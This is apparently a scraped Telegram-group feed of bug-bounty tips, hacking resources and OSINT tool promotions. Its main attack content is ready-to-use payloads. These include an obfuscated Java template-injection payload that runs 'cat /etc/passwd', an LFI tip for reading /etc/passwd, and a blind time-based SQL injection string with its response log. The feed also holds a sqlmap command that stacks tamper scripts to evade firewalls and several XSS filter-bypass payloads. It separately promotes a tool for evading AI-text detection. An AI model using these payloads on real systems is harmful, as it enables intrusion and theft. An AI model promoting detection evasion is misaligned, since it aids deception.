Termux All Command [Telegram Group]

🔍 7 Free Online #OSINT Tools GHUNT - Google account info Sherlock - nickname enumeration Holehe - search accounts by email Ignorant - search accounts by phone Whois domain lookup WhatsApp profile info HudsonRock - email leaks lookup Check them out: osint.rocks

🎉just got LFI at one of the Hackerone program. 🤝tip: in multipart request there was parameter "PATH" simply entered /etc/passwd and got this great response.

Bug : Remote Code Execution Parameter : /parameter/invoice/{payload}/2627627 Payload : ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} Context : first of all i have tried SSTI ${7*7} got 49 so i confirmed that there is possibility of SSTI. Later on determined it's JAVA. just trying more and more got .

Blind Boolean-Based SQLi . a'-IF(LENGTH(database())>100,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error . a'-IF(LENGTH(database())>11,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error . a'-IF(LENGTH(database())>10,SLEEP(7),0)or'1'='1 ----> HTTP/2 500 Internal Server Error . a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>8,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>7,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>6,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . a'-IF(LENGTH(database())>5,SLEEP(7),0)or'1'='1 ----> HTTP/2 200 OK . Database Length is == 10 characters

Open Perplex New free AI search engine and chat assistant. Based on Meta LLama 3 70B. Can be used as an alternative to ChatGPT, Perplexity, You etc. openperplex.com

Web Vulnerability Resource - XSS Unferstanding XSS Attack https://lnkd.in/dg9THu25 XSS Filter Evasion by johnermac https://lnkd.in/dk_gpSRP Payloads XSs Evasion by citybasebrooks https://lnkd.in/d4YQjBxE XSS Resource by BruteLogic https://lnkd.in/dcVG-RSX XSS Challegens https://lnkd.in/dhcbNe6d https://lnkd.in/dif8SVjK How to Find XSS by HackerOne https://lnkd.in/dvqNm5bT Learning about Cross Site Scripting (XSS) https://lnkd.in/dYETX2VV XSS CheatSheet by Portswigger Labs https://lnkd.in/dAxxwj4 Hacktivity XSS by HackerOne https://lnkd.in/dNNM86wx XSS Explained by NahamSec https://lnkd.in/dJiTs2td XSS Stored, Blind, Reflected and DOM by InsiderPhD https://lnkd.in/d9KzwBfd Web Hacking Beyond Alert by Wild West https://lnkd.in/djbgjFS8 XSS Tools XSSTRIKE https://lnkd.in/dJkuhQ4X Dalfox https://lnkd.in/dp_UnjGM XSSMap https://lnkd.in/dgfqdEhj FinDOM XSS https://lnkd.in/dffQm67D

Here we are! The Compressive SQLMap Command for You!. sqlmap -u "target.com" --crawl=3 --level=5 --risk=3 --tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,commalesslimit,commalessmid,commentbeforeparentheses,concat2concatws,equaltolike,escapequotes,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,overlongutf8,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,varnish,versionedkeywords,versionedmorekeywords,xforwardedfor" --dbs --random-agent --batch --threads=10 --output-dir=InjectionResult --time-sec=10 --retries=3 --flush-session --fresh-queries -v 3

HTML Sanitizer Bypass Cloudflare leads to XSS 🛠 payload: '<00 foo="XSS-CLick--%20/ hashtag#infosec hashtag#cybersec hashtag#bugbountytips

Digital Methods Tools Archive 60+ free online tools for various highly specialized tasks in online investigations. For example: - Wikipedia Edits IP Localizer - Robots.txt Discovery - Amazon Related Product Graph and more. https://wiki.digitalmethods.net/Dmi/ToolDatabase 

🔍 urldna.io – A Free OSINT Tool for URL Analysis urldna.io offers detailed information about any URL, including: Screenshots SSL certificates IP addresses Title/body text Cookies Technologies HTTP requests Headers Console messages Meta tags Try it now: urldna.io

Twitter Tools View username, display name and bio history of any Twitter user. twitter.lolarchiver.com Partly free. Works well, but not always accurately. Use in combination with other similar tools (like UserSearch etc).

🔖afrog - Vulnerability Scanner afrog is a fast and reliable tool for finding and fixing vulnerabilities. It supports custom PoCs and detects issues like CVEs, unauthorized access, and file reading. 📌 GitHub: github.com/zan8in/afrog

A Javascript Polyglot for Cross-Site Scripting (XSS) 🛡

𝐗𝐒𝐒 𝐛𝐲𝐩𝐚𝐬𝐬 𝐮𝐬𝐢𝐧𝐠 𝐔𝐧𝐢𝐜𝐨𝐝𝐞 𝐞𝐬𝐜𝐚𝐩𝐞 𝐰𝐢𝐭𝐡 𝐇𝐓𝐌𝐋 𝐄𝐧𝐭𝐢𝐭𝐢𝐞𝐬. 𝐕𝐮𝐥𝐧 : 𝟏. " 𝐨𝐧𝐜𝐥𝐢𝐜𝐤=𝐥𝐨𝐜𝐚𝐭𝐢𝐨𝐧.𝐡𝐫𝐞𝐟="𝐣𝐚𝐯𝐚𝐬𝐜𝐫𝐢𝐩𝐭:𝟏"> First try, 𝗼𝗻𝗰𝗹𝗶𝗰𝗸 (event handler) passes. However, 𝗹𝗼𝗰𝗮𝘁𝗶𝗼𝗻.𝗵𝗿𝗲𝗳 does not pass and is blocked by waf. 𝟐. " 𝐨𝐧𝐜𝐥𝐢𝐜𝐤=𝐥\𝐮{𝟔𝐅}𝐜𝐚𝐭𝐢\𝐮{𝟔𝐅}𝐧.𝐡𝐫𝐞𝐟="𝐣𝐚𝐯𝐚𝐬𝐜𝐫𝐢𝐩𝐭:𝟏"> Second try, bypassing 𝗹𝗼𝗰𝗮𝘁𝗶𝗼𝗻.𝗵𝗿𝗲𝗳 with unicode escape. \𝘂{𝟲𝗙} is the unicode escape of the letter 𝗼. Payload bypass 𝗹𝗼𝗰𝗮𝘁𝗶𝗼𝗻.𝗵𝗿𝗲𝗳 with unicode escape successfully passed. However, our payload gets output like "𝗼𝗻𝗰𝗹𝗶𝗰𝗸=𝗹\\𝘂{𝟲𝗙}𝗰𝗮𝘁𝗶\\𝘂{𝟲𝗙}𝗻.𝗵𝗿𝗲𝗳=> When we added a backslash from the previous unicode escape, the web app automatically added another backslash which caused our payload to not work. 𝟑. " 𝐨𝐧𝐜𝐥𝐢𝐜𝐤=𝐥&#𝟗𝟐;𝐮{𝟔𝐅}𝐜𝐚𝐭𝐢&#𝟗𝟐;𝐮{𝟔𝐅}𝐧.𝐡𝐫𝐞𝐟="𝐣𝐚𝐯𝐚𝐬𝐜𝐫𝐢𝐩𝐭:𝟏"> Our next experiment bypassed the backslash using the HTML Entities encode. &#𝟵𝟮; is the HTML Entities encode of the backslash. Our payload passes and the XSS is successfully triggered on the Firefox browser. 𝐅𝐮𝐥𝐥 𝐩𝐚𝐲𝐥𝐨𝐚𝐝: " onclick​=l\u{6F}cati\u{6F}n.href="javascript​:alert(1)">

🚩 19 Courses to learn Ethical Hacking 👇 https://drive.google.com/drive/u/0/mobile/folders/1CdrveRU2iXGabR-nQ-G1o9GC4GusU-92?fbclid=IwAR1K9QFH8vK4k432rh7V7rnd_sHtGCHx6Tt7uNlkpmOUkQ_2RZaotFvymX0

🚩 Bug Bounty Hunting: Guide to an Advanced Earning Method👇 https://drive.google.com/drive/folders/1t-hTqg0-02t0cnc5SypHnb8t3CfE3bXU 🚩 Bug Bounty: Android Hacking👇 https://mega.nz/#F!h4hHGIYa!2ta4n94iQNnVzpJToVPLVw 🚩 Bug Bounty: Web Hacking👇 https://drive.google.com/file/d/1Z6vX133ZA5DGIhrBJAuJfMJ2Gu7Y4C21/edit 🚩 Burp Suite Bug Bounty Web Hacking from Scratch👇 https://drive.google.com/file/d/1eWy5HVLw3tvw4lfsT7kYb5dnD1l0RsoW/view 🚩 Bug Bounty Hunting - Offensive Approach to Hunt Bugs👇 https://mega.nz/#F!Ge4gmSIL!lW-7XC2DnEKryjXie35APw!mGw30bCI

HOW TO BYPASS AI DETECTION Imagine a world where AI-generated content blends seamlessly with human creativity, making it impossible to distinguish between the two. Fascinating, isn’t it? Now you can bypass detection systems effortlessly while maintaining the art of writing. > Website: bypassgpt.ai

Here are the top 40 YouTubers in cybersecurity: 1. David Bombal 2. Null Byte 3. NetworkChuck 4. CYBER TRUTH 5. HackerSploit 6. IppSec 7. John Hammond 8. Cyber Insecurity 9. The Cyber Mentor 10. LearnCyberSecurity 11. GeraldAuger 12. HackerSploit 13. Sami Laiho 14. Navin Reddy 15. The PC Security Channel 16. Security Tube 17. OTW Cybersecurity 18. CyberTalkinators 19. Trace Labs 20. The Cyber Mentor 21. LiveOverflow 22. Cyber Secrets 23. HackerOne 24. HackingeBooks CTF 25. Seytonic 26. Cybr 27. Adrian Crenshaw 28. BlackHat Python 29. Cybr Expert 30. TechSavvy 31. TechNintra 32. SecurityIdiots 33. HackerOne 34. SemmleDev 35. Hackers.Mayuri 36. Hak5 37. Gabriel Alonso 38. CyberMentor 39. STÖK 40. Cyber Weapons Lab #ig1code #imagine1code #chatgpt #StackOverflow #Youtube #youtubeshorts #youtubechannel